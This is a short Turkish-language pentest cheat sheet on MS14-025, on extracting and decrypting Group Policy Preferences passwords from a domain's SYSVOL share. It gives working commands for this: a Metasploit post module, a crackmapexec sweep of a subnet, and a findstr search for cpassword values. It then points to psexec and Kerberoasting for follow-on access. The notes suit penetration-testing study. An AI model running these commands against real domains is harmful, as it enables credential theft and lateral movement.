MS14-025 (GPP Abusing)
GPP'ler domain controller'da SYSVOL dosyası altında tutulur. Yetkili veya yetkisiz tüm kullanıcılar bu dosyaya erişebilir. Hatalı yapılandırılmış şifreleme politikasından dolayı bu şifreleri kırmak çok kolay olacaktır.
Konumu:
\\<DOMAIN\SYSVOL\<DOMAIN>\Policies\

metasploit modülü kullanarak sysvoldaki gizli parola çıkartılabilir. Metasploit bu parolayı bizler için decrypt te eder.

Manuel olarak smb sunucusuna bağlanıp sysvolden bunu çekmekte mümkün. Manuel olarak çekersek bunu aşağıda ki toolu kullanarak kırmalıyız.

Artık bir kullanıcı elde ettik. psexec vs ile bağlanabiliriz, eğer bağlanamazsak kerberosting saldırısı denenebilir.
2. YOL:
use post/windows/gather/credentials/gpp
set session 1
exploit
Crackmapten kontrolü.
crackmapexec smb 10.10.20.0/24 -u kullanici -p parola -M gpp_password
SYSVOL içerisinde Encrypt edilmiş cpasswordün tespit edilmesi
findstr /S /I cpassword \\\sysvol\\policies\*.xml
Last updated